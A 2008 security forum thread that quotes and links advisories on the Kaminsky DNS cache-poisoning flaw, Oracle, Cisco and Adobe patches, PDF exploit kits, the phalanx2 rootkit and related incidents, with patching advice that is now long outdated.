"Overview: Microsoft Update KB951748 [MS08-037] is known to cause loss of internet access for ZoneAlarm users on Windows XP/2000. Windows Vista users are not affected.
Impact: Sudden loss of internet access
Platforms Affected: ZoneAlarm Free, ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Anti-Spyware, and ZoneAlarm Security Suite ...
Recommended Actions:
Download and install the latest versions which solve the loss of internet access problem here*..."

//

FYI...

Oracle Critical Patch Update Advisory - July 2008
- http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
2008-JUL-15 - Initial release
"...Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible..."

- http://isc.sans.org/diary.html?storyid=4732
Last Updated: 2008-07-15 20:45:56 UTC ...(Version: 2) - "...first time patches for BEA, Hyperion and TimesTen technology are included in the release. If you are running software from these recently-acquired vendors, please be aware..."

- http://www.us-cert.gov/current/#oracle_releases_critical_patch_update3
July 15, 2008 - "Oracle has released their Critical Patch Update for July 2008 to address 45 vulnerabilities across several products. This update contains the following security fixes:
* 11 updates for Oracle Database
* 3 updates for Times Ten In-Memory Database
* 9 updates for Oracle Application Server
* 6 updates for Oracle E-Business Suite and Applications
* 2 updates for Oracle Enterprise Manager
* 7 updates for Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne
* 7 updates for BEA Product Suite ..."

:fear::spider:

RE: http://forums.spybot.info/showpost.php?p=210672&postcount=77

FYI... http://isc.sans.org/diary.html?storyid=4765
Last Updated: 2008-07-22 11:01:30 UTC - "It seems the cat might be out of the bag regarding Dan Kaminsky's upcoming presentation at Blackhat. Since this now means the bad guys have access to it at will - I found the speculations using Google, I'm sure they have done so already, the urgency of patching your recursive DNS servers just increased significantly..."

- http://preview.tinyurl.com/64wtnc
July 21, 2008 (Computerworld)

- http://www.us-cert.gov/current/#dns_implementations_vulnerable_to_cache
updated July 22, 2008 - "...UPDATE: Technical details regarding this vulnerability have been posted to public websites. Attackers could use these details to construct exploit code. Users are encouraged to patch vulnerable systems immediately..."

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1447
CVSS v2 Base score: 7.5 (High)

:fear:

FYI...

- http://securitylabs.websense.com/content/Alerts/3139.aspx
07.23.2008 - "...At time of this alert, an exploit targeting this flaw has been added to Metasploit, an open source penetration testing tool that is free and publicly available. The US-CERT advisory also makes the several important “DNS best practices” recommendations. Please reference the advisory for complete details. http://www.kb.cert.org/vuls/id/800113 "

- http://www.microsoft.com/technet/security/Bulletin/MS08-037.mspx
Revisions
• V2.1 (July 23, 2008): Affected Software table revised to add MS06-064, MS07-062, and MS08-001 as bulletins replaced by this update.

//

FYI...

DNS Exploit in the Wild...
- http://isc.sans.org/diary.html?storyid=4765
Last Updated: 2008-07-24 13:15:25 UTC ...(Version: 6) - "... A second module has been released for domains, which replaces the nameservers of the target domain. Unlike the first module which will not replace a cached entry, this exploit will do cache overwrites.
See http://blog.wired.com/27bstroke6/2008/07/dns-exploit-in.html
...Emerging Threats is offering a freely available snort signature* for DNS servers. As always, test before using in critical production environments."

* http://www.emergingthreats.net/content/view/87/1/
24 July 2008

:fear:

FYI...

- http://www.theregister.co.uk/2008/07/25/isps_slow_to_patch/
25 July 2008 - "More than two weeks after security researchers warned of a critical defect in the net's address lookup system, some of the world's biggest internet service providers - including AT&T, BT, Time Warner and Bell Canada - have yet to install a patch inoculating their subscribers against attacks. According to an informal survey of Register readers, 15 ISPs failed the "Check my DNS" test*... Now that attack code exploiting the vulnerability has been leaked into the wild, millions of subscribers are at risk of being silently redirected to impostor sites that try to install malware or steal sensitive information. Comcast and Plusnet were the only two ISPs we found that weren't vulnerable... Subscribers of ISPs that are still vulnerable ought to hardwire an alternate DNS server into their operating system. We're partial to OpenDNS**. They've been vulnerability free... Other ISPs that were reported vulnerable include: Skybroadband, Carphone Warehouse Broadband, Opal Telecom, T-Mobile, Videotron Telecom, Roadrunner, Orange, Enventis Telecom, Earthlink, Griffin Internet and Jazztel. Demon Internet was reported as potentially being vulnerable..."

* http://www.doxpara.com/

** http://opendns.org/

:fear:

FYI...

- http://db.tidbits.com/article/9706
24 Jul 2008 - "...Apple has yet to patch this vulnerability, which affects both Mac OS X and Mac OS X Server. While individual computers that look up DNS are vulnerable, servers are far more at risk due to the nature and scope of the attack. Apple uses the popular Internet Systems Consortium BIND DNS server which was one of the first tools patched, but Apple has yet to include the fixed version in Mac OS X Server, despite being notified of vulnerability details early in the process and being informed of the coordinated patch release date. All users of Mac OS X Server who use it for recursive DNS must immediately switch to an alternative* or risk being compromised and traffic being redirected..."

Apple server alternative:
* https://www.opendns.com/start?device=apple-osx-server

Apple client alternatives:
* OS X Leopard: https://www.opendns.com/start?device=apple-osx-leopard
* OS X Tiger: https://www.opendns.com/start?device=apple-osx-tiger
* OS 9: https://www.opendns.com/start?device=apple-os9

:fear:

FYI...

- http://www.securityfocus.com/brief/783
2008-07-28 - "A group of security researchers demonstrated on Monday one way to use the recent domain-name service (DNS) security issue to compromise computers by redirecting insecure update services to fake servers that install malicious code instead. The attack tool - dubbed Evilgrade by its creators at non-profit Infobyte Security Research - will enable penetration testers to exploit computers using the automated update feature of Sun Microsystems' Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar, DAP, Notepad++, and Speedbit, according to the group*..."
* http://blog.metasploit.com/2008/07/evilgrade-will-destroy-us-all.html

:fear:

FYI...

DNS patches cause problems...
The patches have caused slowdown in servers running BIND and have have crippled some machines running Windows Server
- http://preview.tinyurl.com/65ujxu
July 29, 2008 (Infoworld) - "Patches released earlier this month to quash a critical bug in the DNS (Domain Name System) have slowed servers running BIND (Berkeley Internet Name Domain), the Internet's most popular DNS software, and crippled some systems versions of Windows Server. Paul Vixie, who heads the Internet Systems Consortium (ISC), the group responsible for the BIND software, acknowledged issues with the July 8 fix that was rolled out... Vixie wasn't specific about the extent of the performance problems facing high-volume DNS servers, but said that a second round of patches, due later this week, will remedy port allocation issues and "allow TCP queries and zone transfers while issuing as many outstanding UDP queries as possible." Versions of the second update, which will be designated P2 when they're unveiled, are currently available in beta form for BIND 9.4.3* and BIND 9.5.1**...
ISC wasn't the only vendor involved in first-round DNS patching that has issued a mea culpa. Two weeks ago, Microsoft confirmed that the July 8 DNS update, tagged as MS08-037, was crippling machines running Windows Small Business Server, a suite based on, among other programs, Windows Server 2003... Last Friday, the company unveiled a pair of support documents that spelled out the patch's unintended side effects, but also added Exchange Server 2003 and Internet Security and Acceleration (ISA) Server to the affected list***. A second issue involves every supported version of Windows, ranging from Windows 2000, XP and Vista to Server 2003 and Server 2008.****..."

* http://www.isc.org/sw/bind/view?release=9.4.3b2

** http://www.isc.org/sw/bind/view?release=9.5.1b1

*** http://support.microsoft.com//kb/956189
Last Review: July 25, 2008 - Revision: 1.0

**** http://support.microsoft.com/kb/956188
Last Review: July 25, 2008 - Revision: 1.1

:fear:

FYI...

Apple Security Update 2008-005...
- http://isc.sans.org/diary.html?storyid=4810
Last Updated: 2008-08-01 08:27:35 UTC - "Apple released their patch overnight... Most importantly it contains the workaround for the DNS bug CVE-2008-1447. Also included is an upgrade to PHP 5.2.6 (which was released in source code at http://www.php.net/ on May 1st). Seems we all need to urge Job's gang to release patches significantly faster: it's the price to pay to base parts of your system on open source code. Apple Mac OS X users get it though software update. As always it's one big patch, given that little choice, you'll want to PATCH NOW."

- http://support.apple.com/kb/HT2647
August 01, 2008

- http://www.apple.com/support/downloads/
07/31/2008

- http://secunia.com/advisories/31326/
Release Date: 2008-08-01
Critical: Highly critical
Impact: Security Bypass, Spoofing, Privilege escalation, DoS, System access
Where: From remote
Solution Status: Vendor Patch
OS: Apple Macintosh OS X ...
Solution: Apply Security Update 2008-005...

---

- http://isc.sans.org/diary.html?storyid=4810
Last Updated: 2008-08-01 20:06:50 UTC ...(Version: 3) "...UPDATE ...Apple might have fixed some of the more important parts for servers, but is far from done yet as all the clients linked against a DNS client library still need to get the workaround for the protocol weakness..."

---

Web-based DNS Randomness Test
- https://www.dns-oarc.net/oarc/services/dnsentropy

:fear:

FYI...

BIND: -P2 patches are released
- http://isc.sans.org/diary.html?storyid=4816
Last Updated: 2008-08-02 11:12:39 UTC - "As expected, the Internet Systems Consortium released patches today addressing stability and performance issues some of those having significant load on their systems were struggling with.
* BIND 9.5.0-P2: http://www.isc.org/sw/bind/view/?release=9.5.0-P2
* BIND 9.4.2-P2: http://www.isc.org/sw/bind/view/?release=9.4.2-P2
* BIND 9.3.5-P2: http://www.isc.org/sw/bind/view/?release=9.3.5-P2 ..."

:fear:

For the end-user, to recap all this, IMHO, the bottom line is here:

Web-based DNS Randomness Test
- https://www.dns-oarc.net/oarc/services/dnsentropy
Test My DNS

...and if you still have problems, go here and DO IT:
- http://www.opendns.com/


.

FYI...

- http://securitylabs.websense.com/content/Alerts/3151.aspx
08.06.2008 - "Websense... has discovered that a CNET Networks <http://www.cnet.com/about/?tag=ft> site has been compromised. The main page of the CNET Clientside Developer Blog contains malicious JavaScript code that de-obfuscates into an iframe that loads its primary malicious payload from a different host.

The malicious code is observed to exploit a known integer overflow vulnerability in Adobe Flash ( http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0071 ). At the time of this alert, the site is still hosting the malicious code. Visitors who are not patched against this vulnerability will be infected without any user interaction.
Software vulnerable to this attack includes:
- Adobe, Flash Player, 9.0.115.0*, and previous
- Adobe, Flex, 3.0
- Adobe, AIR, 1.0 ..."

(Screenshot available at the Websense URL above.)

* http://www.adobe.com/go/getflashplayer
Current Adobe Flash Player version 9.0.124.0

:fear::spider:

FYI...

- http://securitylabs.websense.com/content/Alerts/3163.aspx
08.19.2008 - "Websense... has detected that the DNS cache on the default DNS server used by the customers of China Netcom (CNC) has been poisoned. When China Netcom customers mistype and enter an invalid domain name, the poisoned DNS server directs the visitor's browser to a page that contains malicious code. China Netcom is among the top ISPs in that country.
When users mistype a domain name, they are sometimes directed by their ISPs to a placeholder Web site with generic advertisements. This is typically an additional revenue source for the ISP. In the case of CNC, customers of this prominent ISP are directed to a Web site under the control of an attacker. These malicious sites contain an iframe with malicious code that attempts to exploit, among other applications and plug-ins, the Microsoft Snapshot Viewer vulnerability... The malicious iframe points to a server in China hosting exploits for RealPlayer, MS06-014, MS Snapshot Viewer and Adobe Flash player..."

(Screenshots available at the URL above.)

:fear::fear:

FYI...

- http://isc.sans.org/diary.html?storyid=4919
Last Updated: 2008-08-22 14:51:00 UTC - "A RedHat list post* acknowledges that last week "some Fedora servers were illegally accessed. The intrusion into the servers was quickly discovered, and the servers were taken offline. Security specialists and administrators have been working since then to analyze the intrusion and the extent of the compromise as well as reinstall Fedora systems".
* https://www.redhat.com/archives/fedora-announce-list/2008-August/msg00012.html

===

- http://isc.sans.org/diary.html?storyid=4921
Last Updated: 2008-08-22 15:45:39 UTC ...(Version: 2) - "...RedHat has released "shell script* which lists the affected packages and can verify that none of them are installed on a system".
* http://www.redhat.com/security/data/openssh-blacklist.html

:fear::fear:

FYI...

- http://isc.sans.org/diary.html?storyid=4937
Last Updated: 2008-08-26 21:52:26 UTC - "...Sources of compromised keys could include the weak key vulnerability in Debian-based systems a few months ago, so if you haven't updated and replaced those keys, you ought to do so now. The biggest defense is to have any keys, especially those used to authenticate to remote machines and certainly internet facing ones, require a passphrase to use. Check your logs, especially if you use SSH key-based auth, to identify accesses from remote machines that have no business accessing you. If you have IPs, that would be good. To detect if you have Phalanx2, look for /etc/khubd.p2/ (access by cd, not ls) or any directory that is called "khubd.p2". /dev/shm/ may contain files from the attack as well. Tripwire, AIDE and friends should also be able to detect filesystem changes."

- http://www.us-cert.gov/current/#ssh_key_based_attacks
August 26, 2008 - "US-CERT is aware of active attacks against linux-based computing infrastructures using compromised SSH keys. The attack appears to initially use stolen SSH keys to gain access to a system, and then uses local kernel exploits to gain root access. Once root access has been obtained, a rootkit known as "phalanx2" is installed.
Phalanx2 appears to be a derivative of an older rootkit named "phalanx". Phalanx2 and the support scripts within the rootkit, are configured to systematically steal SSH keys from the compromised system. These SSH keys are sent to the attackers, who then use them to try to compromise other sites and other systems of interest at the attacked site. Detection of phalanx2 as used in this attack may be performed as follows:
* "ls" does not show a directory "/etc/khubd.p2/", but it can be entered with "cd /etc/khubd.p2".
* "/dev/shm/" may contain files from the attack.
* Any directory named "khubd.p2" is hidden from "ls", but may be entered by using "cd".
* Changes in the configuration of the rootkit might change the attack indicators listed above. Other detection methods may include searching for hidden processes and checking the reference count in "/etc" against the number of directories shown by "ls".

US-CERT encourages administrators to perform the following actions to help mitigate the risks:
* Proactively identify and examine systems where SSH keys are used as part of automated processes. These keys will typically not have passphrases or passwords.
* Encourage users to use the keys with passphrase or passwords to reduce the risk if a key is compromised.
* Review access paths to internet facing systems and ensure that systems are fully patched.

If a compromise is confirmed, US-CERT recommends the following actions:
* Disable key-based SSH authentication on the affected systems, where possible.
* Perform an audit of all SSH keys on the affected systems.
* Notify all key owners of the potential compromise of their keys.
US-CERT will provide additional information as it becomes available."

:fear::mad::fear:

FYI...

- http://preview.tinyurl.com/5e65le
September 5, 2008 (Computerworld) - "...Symantec urged users* of Norton Internet Security 2008 to first update to Version 15.5, which in turn would allow them to download and install a Firefox 3.0 compatibility update. A separate Firefox 3.0 compatibility patch is available for Norton 360**. Both patches can be obtained by launching Symantec's Live Update feature from within the security applications. This wouldn't be the first time that Symantec's Norton software has created problems for other vendors.."

* http://community.norton.com/norton/board/message?board.id=nis_feedback&thread.id=3365

** http://community.norton.com/norton/board/message?board.id=Norton_360&thread.id=1475

:thud: :sad:

FYI...

Vista 'BSOD' caused by iTunes 8.0
- http://preview.tinyurl.com/4xaol6
September 11, 2008 (Computerworld) - "Apple Inc.'s latest version of iTunes crashes Windows Vista when an iPod or iPhone is connected to the PC, scores of users have reported on Apple's support forum..."


:fear:

FYI...

Cisco - multiple alerts
- http://www.us-cert.gov/current/#cisco_releases_security_alerts
September 24, 2008 - "Cisco has released multiple security alerts to address vulnerabilities in the Unified Communications Manager and IOS. These vulnerabilities may allow a remote unauthenticated attacker to cause a denial-of-service condition, obtain sensitive information, or operate with escalated privileges..."

Direct links available here:
- http://www.cisco.com/en/US/products/products_security_advisories_listing.html
(See those dtd. 24-Sept-2008)

Cisco IOS multiple vulnerabilities
- http://secunia.com/advisories/31990/
Release Date: 2008-09-25
Critical: Moderately critical

ISC analysis
- http://isc.sans.org/diary.html?storyid=5078
Last Updated: 2008-09-26 03:16:41 UTC

:fear:

FYI...

- http://www.us-cert.gov/current/#adobe_pdf_exploit_toolkits_circulating
September 25, 2008 - "US-CERT is aware of public reports* of improved attack toolkits for exploiting vulnerabilities in PDF reader software..."

* http://www.trustedsource.org/blog/153/Rise-Of-The-PDF-Exploits
September 22, 2008 - "...Secure Computing... spotted a new and yet unknown exploit toolkit which exclusively targets Adobe’s PDF format. This toolkit is dubbed the “PDF Xploit Pack”... This new toolkit targets only PDFs, no other exploits are used to leverage vulnerabilities. Typical functions like caching the already infected users are deployed by this toolkit on the sever-side. Whenever a malicious PDF exploit is successfully delivered, the victim’s IP address is remembered for a certain period of time. During this “ban time” the exploit is not delivered to that IP again, which is another burden for incident handling. Other existing toolkits have also been enhanced with PDF exploits lately..."

** http://www.trustedsource.org/blog/118/Recent-Adobe-Reader-vulnerability-exploited-in-the-wild
"...users should make sure to upgrade to Adobe Reader 8.1.2*** as soon as possible..."
*** http://www.adobe.com/support/security/#readerwin

:fear:

FYI...

- http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt089.shtm
October 2008 - "If the recent changes in the financial marketplace have you confused, you’re not alone. The financial institution where you did business last week may have a new name today, and your checks and statements may come with a new look tomorrow. A new lender may have acquired your mortgage, and you could be mailing your payments to a new servicer. Procedures for the banking you do online also may have changed. According to the Federal Trade Commission (FTC), the nation’s consumer protection agency, the upheaval in the financial marketplace may spur scam artists to phish for your personal information.
Phishers may send attention-getting emails that look like they’re coming from the financial institution that recently acquired your bank, savings and loan, or mortgage. Their intent is to collect or capture your personal information, like your credit card numbers, bank account information, Social Security number, passwords, or other sensitive information. Their messages may ask you to “update,” “validate,” or “confirm” your account information..."

(More detail at the URL above.)

:fear::fear:

FYI... http://isc.sans.org/diary.html?storyid=5312
Last Updated: 2008-11-07 15:54:09 UTC - "...at the time of writing this article, according to VirusTotal 0 (yes – ZERO) AV products detected this malicious PDF. Very, very bad. The payload is in a JavaScript object embedded in the PDF document... if you haven't patched your Adobe Reader installations – do it ASAP as the attacks are in the wild."
---

Security Update available for Adobe Reader 8 and Acrobat 8
- http://www.adobe.com/support/security/bulletins/apsb08-19.html
Release date: November 4, 2008
Vulnerability identifier: APSB08-19 ...
Platform: All Platforms
Summary:
Critical vulnerabilities have been identified in Adobe Reader and Acrobat 8.1.2 and earlier versions. These vulnerabilities would cause the application to crash and could potentially allow an attacker to take control of the affected system.
Adobe Reader 9 and Acrobat 9 are -not- vulnerable to these issues.
Adobe recommends users of Acrobat 8 and Adobe Reader 8 who can’t update to Adobe Reader 9 install the 8.1.3 update to protect themselves from potential vulnerabilities...

Adobe Reader:
> Adobe recommends Adobe Reader users update to Adobe Reader 9, available here:
http://www.adobe.com/go/getreader [AdbeRdr90_en_US.exe]
> Users with Adobe Reader 8.0 through 8.1.2, who can’t update to Adobe Reader 9, should update to Adobe Reader 8.1.3:
http://www.adobe.com/products/acrobat/readstep2_allversions.html [AdbeRdr813_en_US.exe] ..."

- http://secunia.com/advisories/29773
Last Update: 2008-11-05
Critical: Highly critical
Impact: Privilege escalation, System access
Where: From remote
Solution Status: Vendor Patch
Software: Adobe Acrobat 3D 8.x, Adobe Acrobat 8 Professional, Adobe Acrobat 8.x. Adobe Reader 8.x
Solution: Upgrade to version 9 or update to version 8.1.3...

:fear::fear:

---
If you were thinking of replacing your Adobe Reader with Foxit, -now- would be the time...

Adobe Reader v9... 33.5MB
- http://www.adobe.com/go/getreader
-OR-
- http://www.foxitsoftware.com/downloads/
Latest version: Foxit Reader 2.3 (.exe) 2.3 Build 3309 - 2.57 MB - 10/14/08

- http://asert.arbornetworks.com/2008/11/pdf-exploit-in-the-wild-and-how-to-decode/
November 7th, 2008 - "...We keep seeing Acrobat get hosed with JS exploits, this won't be the last time."

:wink:

More PDF exploits...

- http://blog.trendmicro.com/adobe-reader-vulnerability-actively-being-exploited/
Nov. 11, 2008 - "Several active exploits targeting a vulnerability in Adobe Reader are now in the wild... Users with unpatched Adobe Reader software may be infected when they unknowingly access a certain remote website or are redirected there from malicious banners and ads. Upon execution, TROJ_PIDIEF.CB could crash Reader and then allow a malicious user to take control of an affected system. This compromises system security and exposes it to more threats as malicious users could easily dump adware and malicious programs..."

:fear::spider:

FYI...

Adobe Reader v9 users w/AIR v1.1 installed
- http://isc.sans.org/diary.html?storyid=5363
Last Updated: 2008-11-17 22:21:15 UTC - "...Adobe has released a bulletin and update to Adobe AIR* that they classify as critical. It fixes some of the same vulnerabilities announced earlier in Flash player. Time to update if you are using AIR..."
* http://www.adobe.com/support/security/bulletins/apsb08-23.html

> http://get.adobe.com/air/
Adobe AIR v1.5 Installer
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5108

- http://secunia.com/advisories/32772/
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

:fear:

FYI...

How to Protect Your Wi-Fi Network from the WPA Hack
- http://lifehacker.com/5079721/how-to-protect-your-wi+fi-network-from-the-wpa-hack
Nov 7 2008 - "WEP Wi-Fi security has been known as an easy-to-crack security protocol for a while now, which is why it was superseded by the more secure Wi-Fi Protected Access (WPA) standard. But now a PhD candidate studying encryption has found an exploit in the WPA standard that would allow a hacker to "send bogus data to an unsuspecting WiFi client," completely compromising your Wi-Fi security and opening your network to all sorts of hacking. Lucky for you, it's not terribly difficult to protect yourself against the new exploit.
The key: Just log into your router, switch off Temporal Key Integrity Protocol (TKIP) as an encryption mode, and use Advanced Encryption System (AES) only. TKIP is the only protocol that the hack applies to, so switching to AES-only will ensure that your Wi-Fi network is safe again. It's quick and easy, so do yourself a favor and make the adjustment now so you don't run into any problems in the future."

:bigthumb: